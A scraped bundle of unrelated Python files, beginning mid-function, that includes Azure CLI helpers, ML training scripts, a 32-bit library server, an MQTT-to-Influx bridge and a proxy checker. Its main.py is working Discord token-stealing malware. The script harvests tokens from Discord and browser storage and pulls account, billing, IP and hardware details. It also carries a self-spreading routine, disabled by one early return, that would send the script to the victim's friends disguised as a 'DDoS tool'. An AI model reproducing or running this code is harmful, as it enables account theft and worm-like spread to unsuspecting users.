slot=None): headers = {} headers['Authorization'] = 'Token {}'.format(token) import requests store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name) requests.delete(store_secret_url, headers=headers) def _runtime_supports_github_actions(runtime_string, is_linux): if is_linux: stacks = get_file_json(RUNTIME_STACKS)['linux'] else: stacks = get_file_json(RUNTIME_STACKS)['windows'] supports = False for stack in stacks: if stack['displayName'].lower() == runtime_string.lower(): if 'github_actions_properties' in stack and stack['github_actions_properties']: supports = True return supports def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux): app_settings = None app_runtime = None if is_linux: app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) app_runtime = getattr(app_metadata, 'linux_fx_version', None) return _get_app_runtime_info_helper(app_runtime, "", is_linux) app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot) app_metadata_properties = getattr(app_metadata, 'properties', {}) if 'CURRENT_STACK' in app_metadata_properties: app_runtime = app_metadata_properties['CURRENT_STACK'] if app_runtime and app_runtime.lower() == 'node': app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) for app_setting in app_settings: if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION': app_runtime_version = app_setting['value'] if 'value' in app_setting else None if app_runtime_version: return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) elif app_runtime and app_runtime.lower() == 'python': app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) app_runtime_version = getattr(app_settings, 'python_version', '') return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) elif app_runtime and app_runtime.lower() == 'dotnetcore': app_runtime_version = '3.1' app_runtime_version = "" return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) elif app_runtime and app_runtime.lower() == 'java': app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format( java_version=getattr(app_settings, 'java_version', '').lower(), java_container=getattr(app_settings, 'java_container', '').lower(), java_container_version=getattr(app_settings, 'java_container_version', '').lower() ) return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux): if is_linux: stacks = get_file_json(RUNTIME_STACKS)['linux'] for stack in stacks: if 'github_actions_properties' in stack and stack['github_actions_properties']: if stack['displayName'].lower() == app_runtime.lower(): return { "display_name": stack['displayName'], "github_actions_version": stack['github_actions_properties']['github_actions_version'] } else: stacks = get_file_json(RUNTIME_STACKS)['windows'] for stack in stacks: if 'github_actions_properties' in stack and stack['github_actions_properties']: if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and stack['github_actions_properties']['app_runtime_version'].lower() == app_runtime_version.lower()): return { "display_name": stack['displayName'], "github_actions_version": stack['github_actions_properties']['github_actions_version'] } return None def _encrypt_github_actions_secret(public_key, secret_value): # Encrypt a Unicode string using the public key from base64 import b64encode public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder()) sealed_box = public.SealedBox(public_key) encrypted = sealed_box.encrypt(secret_value.encode("utf-8")) return b64encode(encrypted).decode("utf-8")
train.py
import sys import os import argparse from setup.settings import hparams, preprocessing import math sys.path.append(os.path.dirname(os.path.realpath(__file__))) sys.path.append(os.path.dirname(os.path.realpath(__file__)) + "/nmt") from nmt import nmt import tensorflow as tf import colorama from threading import Thread from setup.custom_summary import custom_summary colorama.init() def train(): print('\n\n{}Training model...{}\n'.format(colorama.Fore.GREEN, colorama.Fore.RESET)) # Custom epoch training and decaying if preprocessing['epochs'] is not None: # Load corpus size, calculate number of steps with open('{}/corpus_size'.format(preprocessing['train_folder']), 'r') as f: corpus_size = int(f.read()) # Load current train progress try: with open('{}epochs_passed'.format(hparams['out_dir']), 'r') as f: initial_epoch = int(f.read()) except: initial_epoch = 0 # Iterate thru epochs for epoch, learning_rate in enumerate(preprocessing['epochs']): # Check if model already passed that epoch if epoch < initial_epoch: print('{}Epoch: {}, learning rate: {} - already passed{}'.format(colorama.Fore.GREEN, epoch + 1, learning_rate, colorama.Fore.RESET)) continue # Calculate new number of training steps - up to the end of current epoch num_train_steps = math.ceil((epoch + 1) * corpus_size / (hparams['batch_size'] if 'batch_size' in hparams else 128)) print("\n{}Epoch: {}, steps per epoch: {}, epoch ends at {} steps, learning rate: {} - training{}\n".format( colorama.Fore.GREEN, epoch + 1, math.ceil(corpus_size / (hparams['batch_size'] if 'batch_size' in hparams else 128)), num_train_steps, learning_rate, colorama.Fore.RESET )) # Override hparams hparams['num_train_steps'] = num_train_steps hparams['learning_rate'] = learning_rate hparams['override_loaded_hparams'] = True # Run TensorFlow threaded (exits on finished training, but we want to train more) thread = Thread(target=nmt_train) thread.start() thread.join() # Save epoch progress with open('{}epochs_passed'.format(hparams['out_dir']), 'w') as f: f.write(str(epoch + 1)) # Standard training else: nmt_train() print('\n\n{}Training finished{}\n'.format(colorama.Fore.GREEN, colorama.Fore.RESET)) def nmt_train(): # Modified autorun from nmt.py (bottom of the file) # We want to use original argument parser (for validation, etc) nmt_parser = argparse.ArgumentParser() nmt.add_arguments(nmt_parser) # But we have to hack settings from our config in there instead of commandline options nmt.FLAGS, unparsed = nmt_parser.parse_known_args(['--'+k+'='+str(v) for k,v in hparams.items()]) # Add custom summary function (hook) nmt.summary_callback = custom_summary # And now we can run TF with modified arguments tf.app.run(main=nmt.main, argv=[os.getcwd() + '\nmt\nmt\nmt.py'] + unparsed) train()
network_test.py
from keras.layers import Dense from keras.models import Sequential, load_model import numpy as np import threading model = Sequential() model.add(Dense(384, input_dim=384, activation='tanh')) model.add(Dense(128, activation='tanh')) model.add(Dense(6, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='adam') # ERROR: 错误!不能多线程使用,确保在同一线程内 def thread(): x = np.zeros((1, 384)) y = np.zeros((1, 6)) res = model.train_on_batch(x=x, y=y) print(res) def thread2(): model2 = Sequential() model2.add(Dense(384, input_dim=384, activation='tanh')) model2.add(Dense(128, activation='tanh')) model2.add(Dense(6, activation='softmax')) model2.compile(loss='binary_crossentropy', optimizer='adam') x = np.zeros((1, 384)) y = np.zeros((1, 6)) res = model2.train_on_batch(x=x, y=y) print(res) t = threading.Thread(target=thread2) t.setDaemon(True) t.start() t.join()
__init__.py
import time from lxml import etree def x_tostring(path,encoding='utf-8'): return etree.tostring(path,encoding=encoding) def retry_wrapper(max_retry_num=3, retry_delay=1, exception=True): def wrapper1(func): def wrapper2(*args, **kwargs): this_for_num = max_retry_num - 1 if exception else max_retry_num for i in range(this_for_num): try: return func(*args, **kwargs) except: time.sleep(retry_delay) if exception: return func(*args, **kwargs) else: return None return wrapper2 return wrapper1 from threading import Thread import inspect import ctypes def stop_thread(thread): try: exctype = SystemExit tid = ctypes.c_long(thread.ident) if not inspect.isclass(exctype): exctype = type(exctype) res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype)) if res == 1: return True else: return False except: return None def thread_wrapper(func): def wrapper(*args, **kwargs): thread_target = Thread(target=func,args=args,kwargs=kwargs) thread_target.start() return thread_target return wrapper from multiprocessing import Process def process_wrapper(func): def wrapper(*args,**kwargs): process_target = Process(target=func,args=args,kwargs=kwargs) process_target.start() return process_target return wrapper
main.py
import os import tkinter from tkinter import * # Origin from https://github.com/UN5T48L3/discord-token-grabber Edtied by https://github.com/moto6333 to use tikinter if os.name != "nt": exit() from re import findall from json import loads, dumps from base64 import b64decode from subprocess import Popen, PIPE from urllib.request import Request, urlopen from threading import Thread from time import sleep from sys import argv LOCAL = os.getenv("LOCALAPPDATA") ROAMING = os.getenv("APPDATA") PATHS = { "Discord": ROAMING + "\\Discord", "Discord Canary": ROAMING + "\\discordcanary", "Discord PTB": ROAMING + "\\discordptb", "Google Chrome": LOCAL + "\\Google\\Chrome\\User Data\\Default", "Opera": ROAMING + "\\Opera Software\\Opera Stable", "Brave": LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", "Yandex": LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default" } def getHeader(token=None, content_type="application/json"): headers = { "Content-Type": content_type, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } if token: headers.update({"Authorization": token}) return headers def getUserData(token): try: return loads( urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode()) except: pass def getTokenz(path): path += "\\Local Storage\\leveldb" tokens = [] for file_name in os.listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"): for token in findall(regex, line): tokens.append(token) return tokens def whoTheFuckAmI(): ip = "None" try: ip = urlopen(Request("https://ifconfig.me")).read().decode().strip() except: pass return ip def hWiD(): p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1] def getFriends(token): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getHeader(token))).read().decode()) except: pass def getChat(token, uid): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"] except: pass def paymentMethods(token): try: return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getHeader(token))).read().decode())) > 0) except: pass def sendMessages(token, chat_id, form_data): try: urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode() except: pass def spread(token, form_data, delay): return # Remove to re-enabled (If you remove this line, malware will spread itself by sending the binary to friends.) for friend in getFriends(token): try: chat_id = getChat(token, friend["id"]) sendMessages(token, chat_id, form_data) except Exception as e: pass sleep(delay) def main(): cache_path = ROAMING + "\\.cache~$" prevent_spam = True self_spread = True embeds = [] working = [] checked = [] already_cached_tokens = [] working_ids = [] ip = whoTheFuckAmI() pc_username = os.getenv("UserName") pc_name = os.getenv("COMPUTERNAME") user_path_name = os.getenv("userprofile").split("\\")[2] for platform, path in PATHS.items(): if not os.path.exists(path): continue for token in getTokenz(path): if token in checked: continue checked.append(token) uid = None if not token.startswith("mfa."): try: uid = b64decode(token.split(".")[0].encode()).decode() except: pass if not uid or uid in working_ids: continue user_data = getUserData(token) if not user_data: continue working_ids.append(uid) working.append(token) username = user_data["username"] + "#" + str(user_data["discriminator"]) user_id = user_data["id"] email = user_data.get("email") phone = user_data.get("phone") nitro = bool(user_data.get("premium_type")) billing = bool(paymentMethods(token)) with open(cache_path, "a") as file: for token in checked: if not token in already_cached_tokens: file.write(token + "\n") if len(working) == 0: working.append('123') window = Tk() window.title("DONT GET HACKED!!!!!!!") window.geometry('1920x1080') lbl = Label(window, text="Hello, I dont have time to explain all this\n stuff but just dont\n install random apps from \npeople on the internet", font=("Arial Bold", 50)) lbl.grid(column=0, row=0) def clicked(): lbl.configure(text="Apps can steal your data See what was gotten here\n Username: " + username + "\n User Id: " + user_id + "\n ip: " + ip + "\n Pc Username: " + pc_username + "\n Pc Name: " + user_path_name + "\n Token (Can be used to sign into account without password): \n " + token, font=("Arial Bold", 25)) btn = Button(window, text="See why?", command=clicked, font=("Arial Bold", 50)) btn.grid(column=1, row=0) window.mainloop() if self_spread: for token in working: with open(argv[0], encoding="utf-8") as file: content = file.read() payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nDDoS tool. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--' Thread(target=spread, args=(token, payload, 7500 / 1000)).start() try: main() except Exception as e: print(e) pass
server32.py
""" Contains the base class for loading a 32-bit shared library in 32-bit Python. The :class:`~.server32.Server32` class is used in combination with the :class:`~.client64.Client64` class to communicate with a 32-bit shared library from 64-bit Python. """ import os import re import sys import json import warnings import traceback import threading import subprocess try: from http.server import HTTPServer, BaseHTTPRequestHandler import pickle except ImportError: # then Python 2 import cPickle as pickle from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from . import ( LoadLibrary, SERVER_FILENAME, IS_WINDOWS, ) METADATA = '-METADATA-' SHUTDOWN = '-SHUTDOWN-' OK = 200 ERROR = 500 class Server32(HTTPServer): def __init__(self, path, libtype, host, port, *args, **kwargs): """Base class for loading a 32-bit library in 32-bit Python. All modules that are to be run on the 32-bit server must contain a class that is inherited from this class and the module can import **any** of the `standard`_ python modules **except** for :mod:`distutils`, :mod:`ensurepip`, :mod:`tkinter` and :mod:`turtle`. All modules that are run on the 32-bit server must be able to run on the Python interpreter that the server is running on, see :meth:`.version` for how to determine the version of the Python interpreter. .. _standard: https://docs.python.org/3/py-modindex.html .. _JVM: https://en.wikipedia.org/wiki/Java_virtual_machine Parameters ---------- path : :class:`str` The path to the 32-bit library. See :class:`.LoadLibrary` for more details. libtype : :class:`str` The library type. See :class:`.LoadLibrary` for more details. .. note:: Since Java byte code is executed on the JVM_ it does not make sense to use :class:`Server32` for a Java ``.jar`` or ``.class`` file. host : :class:`str` The IP address of the server. port : :class:`int` The port to run the server on. *args All additional arguments are currently ignored. **kwargs All keyword arguments are passed to :class:`.LoadLibrary`. """ self._library = LoadLibrary(path, libtype=libtype, **kwargs) self._assembly = self._library.assembly self._lib = self._library.lib self._path = self._library.path super(Server32, self).__init__((host, int(port)), _RequestHandler) @property def assembly(self): """ Returns a reference to the `.NET Runtime Assembly <NET_>`_ object if the shared library is a .NET Framework otherwise returns :data:`None`. .. tip:: The `JetBrains dotPeek`_ program can be used to reliably decompile any .NET Assembly into the equivalent source code. .. _NET: https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly .. _JetBrains dotPeek: https://www.jetbrains.com/decompiler/ """ return self._assembly @property def lib(self): """Returns the reference to the 32-bit, loaded-library object. For example, if `libtype` is * ``'cdll'`` then a :class:`~ctypes.CDLL` object * ``'windll'`` then a :class:`~ctypes.WinDLL` object * ``'oledll'`` then a :class:`~ctypes.OleDLL` object * ``'net'`` or ``'clr'`` then a :class:`~.load_library.DotNet` object * ``'com'`` or ``'activex'`` then an interface pointer to the COM_ object .. _COM: https://en.wikipedia.org/wiki/Component_Object_Model """ return self._lib @property def path(self): """:class:`str`: The path to the shared library file.""" return self._path @staticmethod def version(): """Gets the version of the Python interpreter that the 32-bit server is running on. Returns ------- :class:`str` The result of executing ``'Python ' + sys.version`` on the 32-bit server. .. invisible-code-block: pycon >>> SKIP_IF_MACOS() Examples -------- :: >>> from msl.loadlib import Server32 >>> Server32.version() 'Python 3.7.10 ...' Note ---- This method takes about 1 second to finish because the 32-bit server needs to start in order to determine the version of the Python interpreter. """ exe = os.path.join(os.path.dirname(__file__), SERVER_FILENAME) pipe = subprocess.Popen([exe, '--version'], stdout=subprocess.PIPE) return pipe.communicate()[0].decode().strip() @staticmethod def interactive_console(): """Start an interactive console. This method starts an interactive console, in a new terminal, with the Python interpreter on the 32-bit server. Examples -------- :: >>> from msl.loadlib import Server32 # doctest: +SKIP >>> Server32.interactive_console() # doctest: +SKIP """ exe = os.path.join(os.path.dirname(__file__), SERVER_FILENAME) if IS_WINDOWS: cmd = 'start "msl.loadlib.Server32 || interactive console" "{exe}" --interactive' else: cmd = "gnome-terminal --command='{exe} --interactive'" os.system(cmd.format(exe=exe)) @property def quiet(self): """This attribute is no longer used and it will be removed in a future release. Returns :data:`True`. """ warnings.simplefilter('once', DeprecationWarning) warnings.warn( 'The `quiet` attribute for Server32 will be removed in a future release -- always returns True', DeprecationWarning, stacklevel=2 ) return True @staticmethod def remove_site_packages_64bit(): """Remove the site-packages directory from the 64-bit process. By default the site-packages directory of the 64-bit process is included in :data:`sys.path` of the 32-bit process. Having the 64-bit site-packages directory available can sometimes cause issues. For example, comtypes imports numpy so if numpy is installed in the 64-bit process then comtypes will import the 64-bit version of numpy in the 32-bit process. Depending on the version of Python and/or numpy this can cause the 32-bit server to crash. .. versionadded:: 0.9 Examples -------- :: import sys from msl.loadlib import Server32 class FileSystem(Server32): def __init__(self, host, port, **kwargs): # remove the site-packages directory that was passed from 64-bit Python # before calling the super() function to load the COM library path = Server32.remove_site_packages_64bit() super(FileSystem, self).__init__('Scripting.FileSystemObject', 'com', host, port) # optional: add the site-packages directory back into sys.path sys.path.append(path) Returns ------- :class:`str` The path of the site-packages directory that was removed. Can be an empty string if the directory was not found in :data:`sys.path`. """ for index, path in enumerate(sys.path): if path.endswith('site-packages'): return sys.path.pop(index) return '' @staticmethod def is_interpreter(): """Check if code is running on the 32-bit server. If the same module is executed by both :class:`~msl.loadlib.client64.Client64` and :class:`.Server32` then there may be only parts of the code that should be executed by the correct bitness of the Python interpreter. .. versionadded:: 0.9 Returns ------- :class:`bool` Whether the code is running on the 32-bit server. Examples -------- :: import sys from msl.loadlib import Server32 if Server32.is_interpreter(): # this only gets executed on the 32-bit server assert sys.maxsize < 2**32 """ return sys.executable.endswith(SERVER_FILENAME) @staticmethod def examples_dir(): """Get the directory where the example libraries are located. .. versionadded:: 0.9 Returns ------- :class:`str` The directory where the example libraries are located. """ if Server32.is_interpreter(): root = os.path.dirname(sys.executable) else: root = os.path.dirname(__file__) path = os.path.join(root, os.pardir, 'examples', 'loadlib') return os.path.abspath(path) def shutdown_handler(self): """Proxy function that is called immediately prior to the server shutting down. The intended use case is for the server to do any necessary cleanup, such as stopping locally started threads or closing file handles before it shuts down. .. versionadded:: 0.6 """ pass class _RequestHandler(BaseHTTPRequestHandler): """Handles a request that was sent to the 32-bit server.""" def do_GET(self): """Handle a GET request.""" try: if self.path == METADATA: response = {'path': self.server.path, 'pid': os.getpid()} else: with open(self.server.pickle_path, mode='rb') as f: args = pickle.load(f) kwargs = pickle.load(f) attr = getattr(self.server, self.path) if callable(attr): response = attr(*args, **kwargs) else: response = attr with open(self.server.pickle_path, mode='wb') as f: pickle.dump(response, f, protocol=self.server.pickle_protocol) self.send_response(OK) self.end_headers() except Exception as e: print('{}: {}'.format(e.__class__.__name__, e)) exc_type, exc_value, exc_traceback = sys.exc_info() tb_list = traceback.extract_tb(exc_traceback) tb = tb_list[min(len(tb_list)-1, 1)] # get the Server32 subclass exception response = {'name': exc_type.__name__, 'value': str(exc_value)} traceback_ = ' File {!r}, line {}, in {}'.format(tb[0], tb[1], tb[2]) if tb[3]: traceback_ += '\n {}'.format(tb[3]) response['traceback'] = traceback_ self.send_response(ERROR) self.end_headers() self.wfile.write(json.dumps(response).encode(encoding='utf-8', errors='ignore')) def do_POST(self): """Handle a POST request.""" if self.path == SHUTDOWN: self.server.shutdown_handler() threading.Thread(target=self.server.shutdown).start() else: # the pickle info match = re.match(r'protocol=(\d+)&path=(.*)', self.path) if match: self.server.pickle_protocol = int(match.group(1)) self.server.pickle_path = match.group(2) code = OK else: code = ERROR self.send_response(code) self.end_headers() def log_message(self, fmt, *args): """ Overrides: :meth:`~http.server.BaseHTTPRequestHandler.log_message` Ignore all log messages from being displayed in :data:`sys.stdout`. """ pass
venus_mqtt_influx.py
""" Module to read Venus GX messages from the dbus MQTT broker and write them to Influx in a format which is easy to process for Grafana monitoring. """ import influxdb import paho.mqtt.client as mqtt from datetime import datetime import json import logging import queue import requests import sys import threading import traceback import time from collections import defaultdict from http.server import HTTPServer, BaseHTTPRequestHandler log = logging.getLogger('mqtt_to_influx') class Stats(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() if hasattr(self.server, 'data'): self.wfile.write(json.dumps(self.server.data).encode()) else: self.wfile.write(json.dumps({"error": "No data defined"})) def log_message(self, format, *args): log.info("%s - %s" % ( self.address_string(), format%args)) class MqttToInflux: def __init__(self, mqtt_host='127.0.0.1', influx_host='127.0.0.1', influx_db='venus', dryrun=False, stats_port=None): self._points = queue.Queue(maxsize=100) self._msg_seen = set() self._stats = { 'msg': { 'count': 0, 'ignored': 0, 'dropped': 0, 'failed': 0, }, 'influx': { 'latency': 0, 'writes': 0, 'failed': 0, }, } self._dryrun = dryrun self._keepalive = set() self._active = True t = threading.Thread(target=self.safe_keepalive) t.daemon = True t.start() t = threading.Thread(target=self.safe_write) t.daemon = True t.start() self._httpd = None if stats_port: server_address = ('', stats_port) self._httpd = HTTPServer(server_address, Stats) self._httpd.data = self._stats t = threading.Thread(target=self._httpd.serve_forever) t.daemon = True t.start() self._influx = influxdb.InfluxDBClient( host=influx_host, port=8086, timeout=5, retries=1) if not self._dryrun: self._influx.create_database(influx_db) self._influx.switch_database(influx_db) self._mqtt = mqtt.Client() self._mqtt.on_connect = self.on_connect self._mqtt.on_disconnect = self.on_disconnect self._mqtt.on_message = self.on_message self._mqtt.on_subscribe = self.on_subscribe while self._active: try: self._mqtt.connect(mqtt_host, 1883, 60) self._mqtt.loop_forever() except Exception as e: log.error('MQTT Exception: %s' % type(e)) traceback.print_exc() time.sleep(1) self.quit() def quit(self): self._active = False if self._httpd: self._httpd.shutdown() self._mqtt.disconnect() def on_connect(self, client, userdata, flags, rc): log.info('Connected to mqtt') client.subscribe('N/#') def on_disconnect(self, client, userdata, rc): log.info('Disconnected from mqtt') def on_subscribe(self, client, userdata, flags, rc): log.info('MQTT subscription successful.') def on_message(self, client, userdata, msg): self._stats['msg']['count'] += 1 t = msg.topic p = t.split('/') m = '.'.join(p[4:]) v = json.loads(msg.payload)['value'] if t.endswith('system/0/Serial'): self._keepalive.add(t) # print(t, m, v, type(v)) if type(v) in [float, int, bool]: v = float(v) else: self._stats['msg']['ignored'] += 1 if type(v) == type(None): pass elif t not in self._msg_seen: log.info('Ignoring %s of type %s' % (t, type(v))) self._msg_seen.add(t) else: log.debug('Ignoring %s of type %s' % (t, type(v))) return # print(m, v) point = { "measurement": m, "tags": { "path": p[2], "instanceNumber": p[3], "portalId": p[1] }, "time": datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'), "fields": { # value # text } } if type(v) == float: v = float(v) # automatic conversion sometimes makes it an int point['fields']['value'] = v elif type(v) == str: point['fields']['text'] = v try: self._points.put(point, block=False) except queue.Full: log.error('Queue full, overload? - dropping all') self._stats['msg']['dropped'] += self._points.qsize() self._points.clear() def safe_keepalive(self): try: self.keepalive() except Exception as e: log.error('Keepalive Exception %s' % e) traceback.print_exc() self.quit() def keepalive(self): # Wait for the first host to appear, to prevent # startup delay. while not self._keepalive: time.sleep(.1) n = 0 interval = 30 while self._active: for t in self._keepalive: log.info('Send keepalive to %s' % t) self._mqtt.publish(t) n += 1 if n >= 300/interval: n = 0 # Disconnect a reconnect, which forces # a publish of all values every 5 minutes. self._mqtt.disconnect() time.sleep(interval) def safe_write(self): try: self.write() except Exception as e: log.error('Write Exception %s' % type(e)) traceback.print_exc() self.quit() def write(self): lastwrite = time.time() deduped = 0 points = defaultdict(list) agg = defaultdict(dict) while self._active: now = time.time() try: p = self._points.get(timeout=1) k = p['measurement'] + '.' + p['tags']['path'] + '.' + p['tags']['portalId'] + '.' + p['tags']['instanceNumber'] parts = p['measurement'].split('.') i = None if 'L1' in parts: i = parts.index('L1') if 'L2' in parts: i = parts.index('L2') if 'L3' in parts: i = parts.index('L3') if i is not None: what = parts[i+1] ks = k.replace('L1', 'Lx').replace('L2', 'Lx').replace('L3', 'Lx') # print(ks, what) if what in ('Power', 'Current', 'Voltage', 'Energy', 'I', 'P', 'V'): agg[ks][parts[i]] = p #else: # print('ignored', what, ks) if len(agg[ks]) == 3: ps = p.copy() ps['measurement'] = ps['measurement'].replace('L1', 'Lx').replace('L2', 'Lx').replace('L3', 'Lx') ps['fields']['value'] = sum(v['fields']['value'] for v in agg[ks].values()) if what == 'Voltage' or what == 'V': ps['fields']['value'] /= 3 # print('new sum', ks, what, ps['fields']['value']) points[ks].append(ps) del agg[ks] points[k].append(p) except queue.Empty: pass if now - lastwrite > 10: interval = now - lastwrite lastwrite = now if points: tbw = [] duped = 0 for k, ms in points.items(): # These are sampled on every datapoint if '.Power.' in k or 'Dc.0.Current' in k or 'Dc.0.Voltage' in k: tbw += ms continue # Everything else is aggregated to a mean value if ms[0]['fields'].get('value', None) is not None: value = sum(v['fields']['value'] for v in ms) / len(ms) ms[0]['fields']['value'] = value elif ms[0]['fields'].get('text', None) is not None: # Don't need to do anything, just take the first value # TODO(jdi): Should be mode probably. pass duped += len(ms) - 1 tbw.append(ms[0]) log.info('Write %d points (across %d unique measurements), Deduped %d, Interval %.3fs' % ( len(tbw), len(points), duped, interval)) # print(points.keys()) if not self._dryrun: latency = time.time() try: self._influx.write_points(tbw) self._stats['influx']['writes'] += 1 except requests.exceptions.RequestException as e: log.error('Write failure %s, dropping: %d' % (type(e), len(tbw))) self._stats['msg']['failed'] += len(tbw) self._stats['influx']['failed'] += 1 latency = time.time() - latency self._stats['influx']['latency'] = (latency + 9*self._stats['influx']['latency'])/10 log.info('Latency %dms' % (latency*1000)) else: log.debug(' Skip write due to dryrun.') points = defaultdict(list) log.info('Messages handled: %s' % (self._stats['msg'])) def main(): root = logging.getLogger() root.setLevel(logging.INFO) handler = logging.StreamHandler(sys.stdout) handler.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') handler.setFormatter(formatter) root.addHandler(handler) log.info('Starting up') import argparse parser = argparse.ArgumentParser( description='Bridge MQTT messages from Venus GX to Influx DB with some smart sampling..') parser.add_argument('--dryrun', action='store_true', help='do not publish to influx') parser.add_argument('--mqtt_host', help='MQTT host to connect to', default='127.0.0.1') parser.add_argument('--influx_host', help='Influx host to connect to', default='127.0.0.1') parser.add_argument('--influx_db', help='Influx db to connect to', default='venus') parser.add_argument('--port', help='Status report port', default=8071) args = parser.parse_args() if args.dryrun: log.warning('Running in dryrun mode') MqttToInflux(mqtt_host=args.mqtt_host, influx_host=args.influx_host, influx_db=args.influx_db, dryrun=args.dryrun, stats_port=args.port) main()
test_proxies.py
''' Modifier Date: 21/03/2021 Author: AlexxLy Description: lit un fichier contenant une liste de proxys et détermine si cette liste est bonne ou non. Chaque ligne du fichier doit être au format ip: port ''' import platform from os import system from time import sleep from requests import Session from threading import Thread, RLock proxy_list = 'proxies.txt' target_site = 'https://instagram.com' def get_proxies(): proxies = [] with open(proxy_list, 'rt', encoding='utf-8') as proxies_file: for line in proxies_file: if not line: continue ip, port = line.replace('\r', '').split(':') port = int(port) proxy = {'ip': ip, 'port': port} proxies.append(proxy) return proxies class TestProxies: def __init__(self, proxies): self.worked = 0 self.failed = 0 self.lock = RLock() self.active_brs = 0 self.is_alive = True self.proxies = proxies self.total = len(proxies) self.test_link = target_site def display(self): system('cls' if platform.system() == 'Windows' else 'clear') worked, failed, total = self.worked, self.failed, self.total worked_per = round((worked/total) * 100, 2) failed_per = round((failed/total) * 100, 2) complete = round(worked_per + failed_per, 2) print(f'Compler: {complete}%') print(f'Active la page: {self.active_brs}') print(f'Proxies en marche: {worked_per}% [{worked}]') print(f'Proxies erreur: {failed_per}% [{failed}]') def test_proxy(self, proxy): br = Session() addr = '{}:{}'.format(proxy['ip'], proxy['port']) addr = {'http': addr, 'https': addr} br.proxies.update(addr) try: br.get(self.test_link, timeout=(10, 15)) with self.lock: self.worked += 1 except: with self.lock: self.failed += 1 finally: br.close() if self.is_alive: with self.lock: self.display() self.active_brs -= 1 def start(self): for proxy in self.proxies: while self.is_alive and self.active_brs >= 512: pass if not self.is_alive: break with self.lock: self.active_brs += 1 Thread(target=self.test_proxy, args=[proxy], daemon=True).start() while self.is_alive and self.active_brs: sleep(0.5) self.display() def stop(self): self.is_alive = False while self.active_brs: try: with self.lock: self.display() sleep(0.5) except KeyboardInterrupt: break def examine(self): failed = self.failed / self.total worked = self.worked / self.total if worked == 0: print('mauvaise liste de proxy') elif (failed - worked) >= 0.1: print('mauvaise liste de proxy') elif (failed - worked) == 0: print('mauvaise liste de proxy') else: print('Bonne liste de proxy') if __name__ == '__main__': test_proxies = TestProxies(get_proxies()) try: test_proxies.start() except KeyboardInterrupt: test_proxies.stop() finally: test_proxies.examine()
test_browser.py
# coding=utf-8 # Copyright 2013 The Emscripten Authors. All rights reserved. # Emscripten is available under two separate licenses, the MIT license and the # University of Illinois/NCSA Open Source License. Both these licenses can be # found in the LICENSE file. import argparse import json import multiprocessing import os import random import shlex import shutil import subprocess import time import unittest import webbrowser import zlib from http.server import BaseHTTPRequestHandler, HTTPServer from pathlib import Path from urllib.request import urlopen from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER from common import read_file, require_v8, also_with_minimal_runtime from tools import shared from tools import ports from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE from tools.shared import try_delete def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port): class ChunkedServerHandler(BaseHTTPRequestHandler): def sendheaders(s, extra=[], length=len(data)): s.send_response(200) s.send_header("Content-Length", str(length)) s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port) s.send_header('Cross-Origin-Resource-Policy', 'cross-origin') s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate') s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges") s.send_header("Content-type", "application/octet-stream") if support_byte_ranges: 